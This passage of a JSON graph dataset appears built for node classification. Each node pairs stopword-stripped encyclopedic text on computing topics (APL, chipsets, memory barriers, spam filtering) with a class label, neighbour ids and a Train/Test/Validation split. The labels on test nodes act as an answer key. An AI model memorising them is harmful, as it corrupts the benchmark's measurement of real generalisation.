screen texas instruments ti model 745 circa 1977 full apl character set featured half full duplex telecommunications modes interacting apl time-sharing service remote mainframe run remote computer job called rje time universal use high-quality graphic displays printing devices unicode support apl character font problem largely eliminated however entering apl characters requires use input method editors keyboard mappings virtual/on-screen apl symbol sets easy-reference printed keyboard cards frustrate beginners accustomed programming languages beginners prior experience programming languages study involving high school students found typing using apl characters hinder students measurable way defense apl use apl requires less coding type keyboard mappings become memorized time also special apl keyboards manufactured use today freely available downloadable fonts operating systems microsoft windows reported productivity gains assume one spend enough time working apl make worthwhile memorize symbols semantics keyboard mappings mention substantial number idioms common tasks unlike traditionally structured programming languages apl code typically structured chains monadic dyadic functions operators acting arrays apl many nonstandard primitives functions operators indicated single symbol combination symbols primitives defined precedence always associate right thus apl read best understood right-to-left early apl implementations circa 1970 programming loop-flow control structures codice_1 codice_2 loops codice_3 constructs instead used array operations use structured programming constructs often necessary since operation could performed full array one statement example codice_4 function codice_5 replace for-loop iteration ιn applied scalar positive integer yields one-dimensional array vector 1 2 3 ... n. recent implementations apl generally include comprehensive control structures data structure program control flow clearly cleanly separated apl environment called workspace workspace user define programs data i.e. data values exist also outside programs user also manipulate data without define program examples apl interpreter first types six spaces awaiting user input output starts column one user save workspace values programs execution status apl uses set non-ascii symbols extension traditional arithmetic algebraic notation single character names single instruction multiple data simd vector functions one way apl enables compact formulation algorithms data transformation computing conway game life one line code nearly versions apl theoretically possible express computable function one expression one line code unusual character set many programmers use special keyboards apl keytops write apl code although various ways write apl code using ascii characters practice almost never done may thought support iverson thesis notation tool thought modern implementations use standard keyboard layouts special mappings input method editors access non-ascii characters historically apl font distinctive uppercase italic alphabetic characters upright numerals symbols vendors continue display apl character set custom font advocates apl claim examples so-called write-only code badly written almost incomprehensible code almost invariably examples poor programming practice novice mistakes occur language advocates also claim far productive apl conventional computer languages working software implemented far less time far fewer programmers using technology also may claim compact terse apl lends well larger-scale software development complexity number lines code reduced greatly many apl advocates practitioners also view standard programming languages cobol java comparatively tedious apl often found time-to-market important trading systems apl makes clear distinction functions operators functions take arrays variables constants expressions arguments return arrays results operators similar higher-order functions take functions arrays arguments derive related functions example sum function derived applying reduction operator addition function applying reduction operator maximum function returns larger two numbers derives function returns largest group vector numbers j language iverson substituted terms verb function adverb conjunction operator apl also identifies features built language represented symbol fixed combination symbols primitives primitives either functions operators coding apl largely process writing non-primitive functions versions apl operators however primitives considered neither functions operators noticeably assignment words used apl literature meanings differ mathematics generality computer science apl explicit representations functions operators syntax thus providing basis clear explicit statement extended facilities language tools experiment displays hello world 'hello world sample user session youtube design theme apl define default actions cases would produce syntax errors programming languages 'hello world string constant displays display default action expression action specified explicitly e.g assignment function parameter another example theme exponentiation apl written indicates raising 2 power 3 would written languages fortran python many languages use signify multiplication 2*3 apl uses however base specified statement apl languages programming languages one would syntax error apl however assumes missing base natural logarithm constant e 2.71828 ... interpreting suppose array numbers gives average reading right-to-left gives number elements x since dyadic operator term left required well parenthesis since otherwise x would taken summation would element x divided number elements x adds elements x building calculates standard deviation since assignment operator appear within expression would place suitable values av sd naturally one would make expression function repeated use rather retyping time following immediate-mode expression generates typical set pick 6 lottery numbers six pseudo-random integers ranging 1 40 guaranteed non-repeating displays sorted ascending order lot concisely although seems complex new apler combines following apl functions also called primitives glyphs since function left left-most x tell apl result simply outputs display single line separated spaces without needing explicit instruction codice_6 also monadic equivalent called codice_15 simply returns one random integer 1 sole operand right inclusive thus role-playing game program might use expression codice_16 roll twenty-sided die following expression finds prime numbers 1 r. time space calculation complexity formula_1 big notation executed right left means note assumes apl origin 1 i.e. indices start 1 apl set use 0 origin codice_45 codice_46 convenient calculations following expression sorts word list stored matrix x according word length following function life written dyalog apl takes boolean matrix calculates new generation according conway game life demonstrates power apl implement complex algorithm little code also hard follow unless one advanced knowledge apl following example also dyalog first line assigns html code variable codice_47 uses apl expression remove html tags explanation apl used many purposes including financial insurance applications artificial intelligence neural networks robotics argued apl calculation tool programming language symbolic nature array capabilities made popular domain experts data scientists require skills computer programmer apl well suited image manipulation computer animation graphic transformations encoded matrix multiplications one first commercial computer graphics houses digital effects produced apl graphics product named visions used create television commercials animation 1982 film tron latterly stormwind boating simulator uses apl implement core logic interfacing rendering pipeline middleware major part physics engine today apl remains use wide range commercial scientific applications example investment management asset management health care dna profiling hobbyists first implementation apl using recognizable apl symbols apl\\360 ran ibm system/360 completed november 1966 though time remained use within ibm 1973 implementors larry breed dick lathwell roger moore awarded grace murray hopper award association computing machinery acm given work design implementation apl\\360 setting new standards simplicity efficiency reliability response time interactive systems 1975 ibm 5100 microcomputer offered apl\\360 one two built-in rom-based interpreted languages computer complete keyboard display supported special symbols used language significant developments apl\\360 included cms/apl made use virtual storage capabilities cms aplsv introduced shared variables system variables system functions subsequently ported ibm system/370 vspc platforms final release 1983 replaced apl2 1968 apl\\1130 became first publicly available apl system created ibm ibm 1130 became popular ibm type-iii library software ibm released apl*plus sharp apl versions apl\\360 added business-oriented extensions data formatting facilities store apl arrays external files jointly developed two companies employing various members original ibm apl\\360 development team two companies i. p. sharp associates ipsa apl\\360 services company formed 1964 ian sharp roger moore others stsc time-sharing consulting service company formed 1969 lawrence breed others together two developed apl*plus thereafter continued work together develop apl separately apl*plus sharp apl stsc ported apl*plus many platforms versions made vax 11 pc unix whereas ipsa took different approach arrival personal computer made sharp apl available platform using additional pc-xt/360 hardware 1993 soliton incorporated formed support sharp apl developed sharp apl sax sharp apl unix apl*plus continues apl2000 apl+win 1985 ian sharp dan dyer stsc jointly received kenneth e. iverson award outstanding contribution apl apl2 significant re-implementation apl ibm developed 1971 first released 1984 provides many additions language notable nested non-rectangular array support available mainframe computers running z/os z/vm workstations running aix linux sun solaris microsoft windows entire apl2 products services team awarded iverson award 2007 dyalog apl first released british company dyalog ltd. 1983 available aix linux including raspberry pi macos microsoft windows platforms based apl2 extensions support object-oriented programming functional programming licences free personal/non-commercial use 1995 two development team john scholes peter donnelly awarded iverson award work interpreter gitte christensen morten kromberg joint recipients iverson award 2016 nars2000 open-source apl interpreter written bob smith prominent apl developer implementor stsc 1970s 1980s nars2000 contains advanced features new datatypes runs natively microsoft windows platforms wine aplx cross-platform dialect apl based apl2 several extensions first released british company microapl 2002 although longer development commercial sale available free charge dyalog gnu apl free implementation extended apl specified iso/iec 13751:2001 thus similar apl2 runs gnu/linux windows using cygwin uses unicode internally written jürgen sauermann richard stallman founder gnu project early adopter apl using write text editor high school student summer 1969 apl traditionally interpreted language language characteristics weak variable typing well suited compilation however arrays core data structure provides opportunities performance gains parallelism parallel computing massively parallel applications very-large-scale integration vlsi outset apl regarded high-performance language example noted speed could perform complicated matrix operations operates arrays performs operations like matrix inversion internally nevertheless apl rarely purely interpreted compilation partial compilation techniques used include following apl interpreters support idiom recognition evaluate common idioms single operations example evaluating idiom codice_48 single operation codice_49 boolean vector codice_50 array creation two intermediate arrays avoided weak typing apl means name may reference array datatype function operator general interpreter know advance form must therefore perform analysis syntax checking etc run-time however certain circumstances possible deduce advance type name expected reference generate bytecode executed reduced run-time overhead bytecode also optimised using compilation techniques constant folding common subexpression elimination interpreter execute bytecode present assumptions made met dyalog apl includes support optimised bytecode compilation apl subject research experiment since language first became available first compiler considered burroughs apl-700 released around 1971 order able compile apl language limitations imposed apex research apl compiler written robert bernecky available gnu public license stsc apl compiler hybrid bytecode optimiser compiler enables compilation functions machine code provided sub-functions globals declared interpreter still used runtime library execute functions meet compilation requirements apl standardized american national standards institute ansi working group x3j10 international organization standardization iso international electrotechnical commission iec iso/iec joint technical committee 1 subcommittee 22 working group 3 core apl language specified iso 8485:1989 extended apl language specified iso/iec 13751:2001",
    "neighbors": [
      15,
      6160,
      7186,
      7188,
      25,
      10778,
      5148,
      5149,
      9245,
      5154,
      5677,
      5168,
      2045,
      7733,
      3126,
      1079,
      3642,
      7739,
      62,
      6718,
      10819,
      8262,
      1610,
      1099,
      6228,
      7775,
      1632,
      9825,
      6248,
      1130,
      2670,
      623,
      2168,
      3705,
      7292,
      9345,
      2181,
      1673,
      6797,
      10387,
      3733,
      8854,
      1178,
      667,
      2206,
      7326,
      1702,
      4777,
      10413,
      1203,
      692,
      5816,
      192,
      8904,
      5833,
      7889,
      228,
      8421,
      10470,
      8426,
      4331,
      10991,
      3323,
      7421,
      2304,
      2821,
      5384,
      9993,
      1804,
      10508,
      5395,
      11539,
      8473,
      8987,
      11036,
      5917,
      5409,
      1826,
      11555,
      3876,
      5413,
      5936,
      11056,
      823,
      1849,
      4921,
      9019,
      8509,
      1343,
      3904,
      6977,
      11075,
      10569,
      8524,
      847,
      2903,
      2904,
      10586,
      1883,
      11099,
      3429,
      6502,
      8549,
      11625,
      8554,
      5492,
      3447,
      3960,
      10110,
      6016,
      6529,
      3462,
      8582,
      4492,
      11153,
      8082,
      1435,
      8606,
      1952,
      8611,
      7076,
      421,
      428,
      10668,
      6062,
      1976,
      5562,
      6074,
      963,
      8644,
      7630,
      11219,
      5588,
      4565,
      4057,
      477,
      4064,
      4069,
      7147,
      5612,
      2030,
      5614,
      1010,
      3573,
      8695,
      1016,
      505,
      2557,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 2520,
    "label": 1,
    "text": "Sqsh:sqsh sqsh pronounced skwish short sqshell pronounced s-q-shell open-source substitute isql interactive sql client supplied sybase adaptive server enterprise ase relational database management system isql sqsh essentially rudimentary command-line tools issuing transact-sql commands ase server receiving displaying results sqsh supports among others command history aliases piping output external programs sources runs various flavours unix including linux well windows cygwin libraries",
    "neighbors": [
      2181,
      4490,
      6797,
      270,
      10413,
      5492,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 2521,
    "label": 2,
    "text": "Line_discipline:line discipline line discipline ldisc layer terminal subsystem unix-like systems terminal subsystem consists three layers upper layer provide character device interface lower hardware driver communicate hardware pseudo terminal middle line discipline implement behavior common terminal devices line discipline glues low level device driver code high level generic interface routines read 2 write 2 ioctl 2 responsible implementing semantics associated device policy separated device driver serial hardware driver used devices require different data handling example standard line discipline processes data receives hardware driver applications writing device according requirements terminal unix-like system input handles special characters interrupt character typically control-c erase kill characters typically backspace delete control-u respectively output replaces lf characters cr/lf sequence serial port could also used dial-up internet connection using serial modem ppp case ppp line discipline would used would accumulate input data serial line ppp input packets delivering networking stack rather character device would transmit packets delivered networking stack serial line unix-like systems use streams implement line disciplines",
    "neighbors": [
      4333,
      8432,
      7188,
      5397,
      5492,
      8697,
      8991
    ],
    "mask": "Test"
  },
  {
    "node_id": 2522,
    "label": 0,
    "text": "Multilingual_notation:multilingual notation multilingual notation representation lexical resource allows translation two words instance within lmf multilingual notation could presented following diagram english french translation diagram two intermediate senseaxis instances used order represent near match fleuve french river english senseaxis instance bottom linked directly english sense notion exist english complex situation two languages concerned following diagram dealing english italian spanish within context multilingual database comprising two languages usually multilingual notations factorized order save number links terms multilingual notations interlingual nodes shared among language descriptions specific context lexical resource bilingual lexicon term bilingual link usually preferred let us note instead translation rather broad meaning authors prefer equivalence words different notions like dynamic formal equivalences term mainly used context machine translation nlp lexicons term used context translation dictionary concerns mainly hand-held electronic translators",
    "neighbors": [
      7780,
      11056,
      7164
    ],
    "mask": "Train"
  },
  {
    "node_id": 2523,
    "label": 3,
    "text": "Elbrus-2S+:elbrus-2s+ elbrus-2s+ multi-core microprocessor based elbrus 2000 architecture developed moscow center sparc technologies mcst multiple reports regarding evolution technology purpose import substitution russia raised several ministries july 2014 due economic sanctions response 2014 pro-russian unrest ukraine december 2014 announced mikron start pilot production dual-core variant microprocessor called elbrus-2sm using 90 nanometer cmos manufacturing process zelenograd russia elbrus-4s cpu reported built support intel x86 emulation well native vliw mode perform 23 instructions per clock cycle programs built elbrus 2000 native mode compiler determines different operations shall distributed 23 computing units saving final program means dynamic scheduling needed runtime thus reducing amount work cpu perform every time program executed static scheduling needs performed one time program built advanced algorithms finding optimal distribution work employed south bridge elbrus 2000 chipset connects peripherals bus cpu developed mcst also compatible mcst-r1000 december 2012 kraftway announced deliver elbrus based pc together partner mcst august 2013 kuyan gusev kozlov kaimuldenov kravtsunov mcst published article based experience building deployment debian linux elbrus computer architecture done using hybrid compiler toolchain cross native elbrus-2s+ intel core 2 duo december 2014 implementation opengl 3.3 standard demonstrated running game doom 3 bfg edition elbrus-4s clocked 720 mhz using radeon graphics card 2 gigabytes video memory april 2015 mcst announced two new products based elbrus-4s cpu one 19-inch rack server four cpus 16 cores one personal computer december 2015 first shipment pcs based vliw cpu elbrus-4s made russia",
    "neighbors": [
      6659,
      7687,
      1425,
      8090,
      1952,
      4386,
      6818,
      6957,
      8625,
      10675,
      2490,
      11580,
      7234,
      2503,
      5457,
      10833,
      2525,
      3294,
      9309,
      5348,
      5358,
      1776,
      499,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2524,
    "label": 3,
    "text": "Nomadik:nomadik nomadik family microprocessors multimedia applications stmicroelectronics based arm9 arm architecture designed specifically mobile devices december 12 2002 stmicroelectronics texas instruments jointly announced initiative open mobile application processor interfaces omapi intended used 2.5 3g mobile phones going produced 2003 later merged larger initiative renamed mipi alliance nomadik stmicroelectronics implementation standard nomadik first presented october 7 2003 ceatec show tokyo later year nomadik microprocessor report analysts choice award application processors family aimed 2.5g/3g mobile phones personal digital assistants portable wireless products multimedia capability addition suitable automotive multimedia applications known device using nomadik processor nokia n96 used stn8815 version chip n96 debuted 2008 absence gpu noticed derivative nomadik created specifically navigation systems gps named cartesio sta2062 used products garmin nüvi 205 nüvi 500 derivative used arm926ej-s coupled sta5620 gps rf downconverter added 32-channel hardware gps correlator nomadik family discontinued 2009 development already begun successor soc called stn8500 superseded novathor family st-ericsson renamed u8500 st-nxp wireless division merged st-ericsson joint venture",
    "neighbors": [
      3585,
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      11396,
      8842,
      11405,
      146,
      659,
      1170,
      1682,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      7877,
      9928,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6925,
      5417,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      9581,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      424,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 2525,
    "label": 3,
    "text": "Chipset:chipset computer system chipset set electronic components integrated circuit known data flow management system manages data flow processor memory peripherals usually found motherboard chipsets usually designed work specific family microprocessors controls communications processor external devices chipset plays crucial role determining system performance computing term chipset commonly refers set specialized chips computer motherboard expansion card personal computers first chipset ibm pc 1984 neat chipset developed chips technologies intel 80286 cpu home computers game consoles arcade-game hardware 1980s 1990s term chipset used custom audio graphics chips examples include commodore amiga original chip set sega system 16 chipset term chipset often refers specific pair chips motherboard northbridge southbridge northbridge links cpu high-speed devices especially ram graphics controllers southbridge connects lower-speed peripheral buses pci isa many modern chipsets southbridge contains on-chip integrated peripherals ethernet usb audio devices motherboards chipsets often come different manufacturers manufacturers chipsets x86 motherboards include amd broadcom intel nvidia sis via technologies apple computers unix workstations traditionally used custom-designed chipsets server manufacturers also develop custom chipsets products 1980s chips technologies pioneered manufacturing chipsets pc-compatible computers computer systems produced since often share commonly used chipsets even across widely disparate computing specialties example ncr 53c9x low-cost chipset implementing scsi interface storage devices could found unix machines mips magnum embedded devices personal computers traditionally x86 computers processor primary connection rest machine motherboard chipset northbridge northbridge directly responsible communications high-speed devices system memory primary expansion buses pcie agp pci cards common examples conversely system communication back processor connection processor northbridge commonly designated front side bus fsb requests resources directly controlled northbridge offloaded southbridge northbridge intermediary processor southbridge southbridge handled everything else generally lower-speed peripherals board functions largest hard disk storage connectivity usb parallel serial communications connection northbridge southbridge normally pci bus 2003 interaction cpu main memory expansion device graphics card — whether agp pci integrated motherboard — directly controlled northbridge ic behalf processor made processor performance highly dependent system chipset especially northbridge memory performance ability shuttle information back processor 2003 however amd introduction athlon 64-bit series processors changed athlon64 marked introduction integrated memory controller incorporated processor thus allowing processor directly access handle memory negating need traditional northbridge intel followed suit 2008 release core series cpus x58 platform newer processors integration increased primarily inclusion system primary pcie controller integrated graphics directly cpu fewer functions left un-handled processor chipset vendors condensed remaining northbridge southbridge functions single chip intel version platform controller hub pch effectively enhanced southbridge remaining peripherals—as traditional northbridge duties memory controller expansion bus pcie interface even on-board video controller integrated cpu die chipset often contains secondary pcie connections though however platform controller hub also integrated processor package second die mobile variants skylake processors",
    "neighbors": [
      3585,
      3586,
      3588,
      1038,
      5649,
      10260,
      7712,
      548,
      8237,
      9774,
      9791,
      11331,
      2635,
      4173,
      1614,
      7247,
      4695,
      1121,
      6250,
      107,
      7788,
      8301,
      2159,
      4208,
      6256,
      1651,
      1660,
      4221,
      9343,
      3203,
      4767,
      4270,
      9400,
      7354,
      2237,
      6339,
      6854,
      3783,
      9427,
      5859,
      2277,
      2791,
      8937,
      1260,
      4334,
      1776,
      6900,
      5368,
      9475,
      8452,
      4872,
      9489,
      3352,
      799,
      6949,
      1322,
      3883,
      1329,
      5938,
      3892,
      6978,
      8514,
      3911,
      9551,
      342,
      4444,
      4451,
      8035,
      8552,
      11630,
      2416,
      5492,
      3445,
      2937,
      4998,
      3464,
      6033,
      7058,
      5523,
      2455,
      8090,
      2463,
      9122,
      10153,
      7086,
      11183,
      8625,
      9649,
      8629,
      9157,
      455,
      7111,
      3530,
      3533,
      3537,
      7122,
      2523,
      7132,
      10715,
      7134,
      4581,
      1000,
      1515,
      7151,
      6129,
      499,
      8698
    ],
    "mask": "None"
  },
  {
    "node_id": 2526,
    "label": 7,
    "text": "Crunchfish:crunchfish crunchfish swedish technology company malmö develops gesture recognition software mobile phone tablet market crunchfish founded 2010 initial focus create innovations ios android app markets gesture recognition using standard webcam main gesture sensor one core innovations company focusing touchless interaction based camera based gestures 2013 april company selected '2013 red herring top 100 company red herring magazine crunchfish produces gesture sensing software set customized mid-air gesture recognition solutions named a3d™ global mobile device manufacturers app developers crunchfish cooperates smartphone manufacturers enable crunchfish gesture sensing technology partners mobile devices crunchfish developed touchless functions chinese gionee smartphone elife e6 launched china july 2013 india africa august 2013 crunchfish integrates touchless functions e.g smartphones technology portable mobile platform devices gesture recognition technology used mobile phones tablets dtvs equipped front-facing camera typical uses crunchfish touchless technology devices intelligent home smartphones tablets digital tv games home electronics built-in standard camera gesture based functionality adds alternative options standard touch interface user example put tablet front him/her free mid-air gesture hands interacting media player without touching smartphone users answer reject phone calls start slideshows photo gallery use video scrubber etc without touching device device pause video playback users look away screen crunchfish touchless a3d software able detect track objects fingers hand gestures face movements three dimensions based video stream embedded standard camera e.g mobile device",
    "neighbors": [
      1083
    ],
    "mask": "Test"
  },
  {
    "node_id": 2527,
    "label": 4,
    "text": "Challenge–response_spam_filtering:challenge–response spam filtering challenge–response c/r system type spam filter automatically sends reply challenge alleged sender incoming e-mail originally designed 1997 stan weatherby called email verification reply sender asked perform action assure delivery original message would otherwise delivered action perform typically takes relatively little effort great effort perform large numbers effectively filters spammers challenge–response systems need send challenges unknown senders senders previously performed challenging action previously sent e-mail would automatically whitelisted c/r systems attempt provide challenges fulfilled easily legitimate senders non-easily spammers two characteristics differ legitimate senders spammers exploited achieve goal listed examples challenges could used exploit differences nowadays c/r systems used widely enough make spammers bother automatically respond challenges therefore c/r systems generally rely simple challenge would made complicated spammers ever build automated responders c/r systems ideally problems sending challenges forged email addresses reduced challenges sent critics c/r systems raised several issues regarding usefulness email defense number issues relate programs auto-respond e-mail including mailing list managers vacation programs bounce messages mail servers spammers use fake non-existent address sender address field e-mail header also use forged existing sender address valid arbitrary person address without person consent latter would become increasingly common e.g callback verification would become popular detect spam c/r systems challenging message forged sender address would send challenge new message person whose address forged would create e-mail backscatter would effectively shift burden person would received spam person whose address forged addition forged sender decided validate challenge c/r user would receive spam anyway forged sender address would whitelisted though definitely undesirable side-effect issue would non-existent people whose email address used forged address spam happen run c/r system case one c/r users must implement form return address signing bounce address tag validation ensure challenge goes also systems like spf dkim became common forged sender addresses would recognized systems reaching c/r system cases c/r systems tricked becoming spam relays useful part message challenge generally included challenge message spammer knowing sending c/r using system could design message spam payload part message challenge message includes case forged sender actual recipient spam c/r system unwittingly relay disseminating ordinary email address protected c/r system results challenges send mail address c/r critics consider rude give people email address require unless previously whitelisted might always possible answer challenge send mail advocates c/r systems argue benefits far outweigh 'burden incidental challenge probably never final solution spam without laying kind burden e-mail sender reason widespread use c/r systems understood accepted appreciated analogy snail mail sender prepared pay stamp analogy phone calls caller prepared pay outgoing call c/r systems interact badly mailing list software person subscribed mailing list begins use c/r software posters mailing list may confronted challenge messages order confirmations billing statements delivery notices online shopping systems usually sent via automated systems email challenges sent systems lost legitimate mail sent systems may reach c/r system user advocates c/r systems argue though takes extra effort solutions problems exist end-user behind c/r system simple things c/r advocates claim systems lower rate false positives systems automatically filtering unsolicited bulk email critics argue typical users c/r systems still need review challenged mail regularly looking non-bulk mail solicited bulk email sender responded challenge issue particularly notable newsletters transactional messages solicited bulk email senders usually check challenges mail however bulk email question solicited c/r user could expected added whitelist bulk email solicited definition spam filtered c/r system",
    "neighbors": [
      3549,
      8224,
      2887,
      519,
      6762,
      8202,
      8337,
      6975,
      10906,
      3323,
      6876,
      3645,
      5407
    ],
    "mask": "Test"
  },
  {
    "node_id": 2528,
    "label": 4,
    "text": "Safetica_Technologies:safetica technologies safetica technologies european data loss prevention software dlp vendor safetica dlp designed contextual protection data endpoint level blocks erroneous malicious actions might lead sensitive files leaving company safetica also identify wasted costs connected low work productivity ineffective use software licenses wasted print company history goes back 2007 group security professionals led founder jakub mahdal started developing security solutions czech republic 2011 company started using name safetica technologies introduced first version product called safetica dlp soon partnered top-class investor ondřej tomek put 1,000,00 research development got first customers abroad 2013 safetica started distribution markets asia middle east 2015 safetica technologies received 1,500,000 investment product development petr žikeš became new ceo 2016 company partnered global antivirus company eset bundle products antivirus products means safetica distributed throughout global sales network covering 180 countries",
    "neighbors": [
      3629,
      10245,
      131,
      2213
    ],
    "mask": "None"
  },
  {
    "node_id": 2529,
    "label": 3,
    "text": "Memory_barrier:memory barrier memory barrier also known membar memory fence fence instruction type barrier instruction causes central processing unit cpu compiler enforce ordering constraint memory operations issued barrier instruction typically means operations issued prior barrier guaranteed performed operations issued barrier memory barriers necessary modern cpus employ performance optimizations result out-of-order execution reordering memory operations loads stores normally goes unnoticed within single thread execution cause unpredictable behaviour concurrent programs device drivers unless carefully controlled exact nature ordering constraint hardware dependent defined architecture memory ordering model architectures provide multiple barriers enforcing different ordering constraints memory barriers typically used implementing low-level machine code operates memory shared multiple devices code includes synchronization primitives lock-free data structures multiprocessor systems device drivers communicate computer hardware program runs single-cpu machine hardware performs necessary bookkeeping ensure program executes memory operations performed order specified programmer program order memory barriers necessary however memory shared multiple devices cpus multiprocessor system memory-mapped peripherals out-of-order access may affect program behavior example second cpu may see memory changes made first cpu sequence differs program order following two-processor program gives example out-of-order execution affect program behavior initially memory locations codice_1 codice_2 hold value codice_3 program running processor 1 loops value codice_2 zero prints value codice_1 program running processor 2 stores value codice_6 codice_1 stores value codice_8 codice_2 pseudo-code two program fragments shown steps program correspond individual processor instructions processor 1 processor 2 one might expect print statement always print number 42 however processor 2 store operations executed out-of-order possible codice_2 updated codice_1 print statement invoked come loop similarly processor 1 load operations may executed out-of-order possible codice_1 read codice_2 checked print statement might therefore print unexpected value programs neither situations acceptable memory barrier inserted processor 2 assignment codice_2 ensure new value codice_1 visible processors prior change value codice_2 another inserted processor 1 access codice_1 ensure value codice_1 read prior seeing change value codice_2 another example driver performs following sequence processor store operations executed out-of-order hardware module may triggered data ready memory another illustrative example non-trivial one arises actual practice see double-checked locking multithreaded programs usually use synchronization primitives provided high-level programming environment java .net framework application programming interface api posix threads windows api synchronization primitives mutexes semaphores provided synchronize access resources parallel threads execution primitives usually implemented memory barriers required provide expected memory visibility semantics environments explicit use memory barriers generally necessary api programming environment principle high-level memory model defines memory visibility semantics although programmers usually need use memory barriers high level environments important understand memory visibility semantics extent possible understanding necessarily easy achieve memory visibility semantics always consistently specified documented programming language semantics defined different level abstraction machine language opcodes programming environment memory model defined different level abstraction hardware memory model important understand distinction realize always simple mapping low-level hardware memory barrier semantics high-level memory visibility semantics particular programming environment result particular platform implementation posix threads may employ stronger barriers required specification programs take advantage memory visibility implemented rather specified may portable memory barrier instructions address reordering effects hardware level compilers may also reorder instructions part program optimization process although effects parallel program behavior similar cases general necessary take separate measures inhibit compiler reordering optimizations data may shared multiple threads execution note measures usually necessary data protected synchronization primitives discussed prior section c c++ volatile keyword intended allow c c++ programs directly access memory-mapped i/o memory-mapped i/o generally requires reads writes specified source code happen exact order specified omissions omissions reorderings reads writes compiler would break communication program device accessed memory-mapped i/o c c++ compiler may omit reads writes volatile memory locations may reorder read/writes relative actions volatile location variable keyword volatile guarantee memory barrier enforce cache-consistency therefore use volatile alone sufficient use variable inter-thread communication systems processors c c++ standards prior c11 c++11 address multiple threads multiple processors usefulness volatile depends compiler hardware although volatile guarantees volatile reads volatile writes happen exact order specified source code compiler may generate code cpu may re-order execution volatile read write reordered regard non-volatile reads writes thus limiting usefulness inter-thread flag mutex preventing compiler specific compilers like gcc reorder operations around in-line assembly code volatile memory tags like asm volatile memory see examples compiler memory barrier moreover guaranteed volatile reads writes seen order processors cores due caching cache coherence protocol relaxed memory ordering meaning volatile variables alone may even work inter-thread flags mutexes",
    "neighbors": [
      4616,
      9224,
      3082,
      5139,
      10780,
      10785,
      6180,
      5677,
      8242,
      9266,
      4161,
      9794,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5754,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      2224,
      10933,
      5815,
      187,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      1776,
      10482,
      2294,
      8439,
      2809,
      7421,
      6403,
      4360,
      1291,
      6926,
      4367,
      792,
      799,
      10016,
      295,
      5415,
      6968,
      7992,
      318,
      3911,
      6988,
      2383,
      10063,
      5457,
      5975,
      11095,
      1378,
      10091,
      372,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      1952,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      3573,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2530,
    "label": 3,
    "text": "Dual_format:dual format dual format technique used allow two completely different systems software reside disk term used amiga atari st platform indicate disk could inserted either machine would still boot run secret behind lies special layout first track disk contained amiga atari st bootsector time fooling operating system think track resolved format expected games used technique three produced eclipse software design stone age monster business lethal xcess st/amiga format magazine also used technique coverdisks amiga pc dual-format games also existed like budget version rick dangerous game 3d pool even contained tri-format disk contained amiga atari st pc versions game dual tri-format disks implemented using technology developed rob computing recently dual format come identify software distributed single disk includes windows macintosh versions installation program list dual format floppy disk titles",
    "neighbors": [
      1801,
      8300,
      6797,
      6129,
      10328,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 2531,
    "label": 5,
    "text": "Security_Parameter_Index:security parameter index security parameter index spi identification tag added header using ipsec tunneling ip traffic tag helps kernel discern two traffic streams different encryption rules algorithms may use spi per rfc 2401 required part ipsec security association sa enables receiving system select sa received packet processed spi local significance since defined creator sa spi generally viewed opaque bit string however creator sa may interpret bits spi facilitate local processing works like port numbers tcp udp connections means could different sas used provide security one connection sa could therefore act set rules carried encapsulating security payload esp header authentication header ah length 32 bits",
    "neighbors": [
      10908,
      3742
    ],
    "mask": "Test"
  },
  {
    "node_id": 2532,
    "label": 5,
    "text": "Cell_Loss_Priority:cell loss priority cell loss priority clp flag bit atm cell header determines probability cell discarded network becomes congested cells clp 0 insured traffic unlikely dropped cells clp 1 best-effort traffic may discarded congested conditions order free resources handle insured traffic clp used control network traffic policing mechanism policing process determines cells meet predefined restrictions enter atm network restrictions include traffic rates burst sizes agreed upon customer network provider",
    "neighbors": [
      2912,
      835
    ],
    "mask": "Test"
  },
  {
    "node_id": 2533,
    "label": 3,
    "text": "Burroughs_B1700:burroughs b1700 burroughs b1000 series series mainframe computers built burroughs corporation originally introduced 1970s continued software development 1987 series consisted three major generations b1700 b1800 b1900 series machines also known burroughs small systems contrast burroughs large systems b5000 b6000 b7000 b8000 burroughs medium systems b2000 b3000 b4000 much original research b1700 initially codenamed plp proper language processor program language processor done burroughs pasadena plant production b1700s began mid-1970s occurred santa barbara liege belgium plants majority design work done santa barbara b1830 notable exception designed liege b1000 distinguished machines writeable control store allowing machine emulate machine burroughs mcp master control program would schedule particular job run mcp would preload interpreter whatever language required interpreters presented different virtual machines cobol fortran etc notable idea semantic gap ideal expression solution particular programming problem real physical hardware illustrated inefficiency current machine implementations three burroughs architectures represent solving problem building hardware aligned high-level languages so-called language-directed design contemporary term today often called high-level language computer architecture large systems stack machines efficiently executed algol medium systems b2000 3000 b4000 aimed business world executing cobol thus everything done bcd including addressing memory b1000 series perhaps universal solution perspective used idealized virtual machines language actual hardware built enhance capability perhaps obvious examples bit-addressable memory variable size arithmetic logic unit alu ability data register instruction register allowing efficient instruction parsing another feature machine 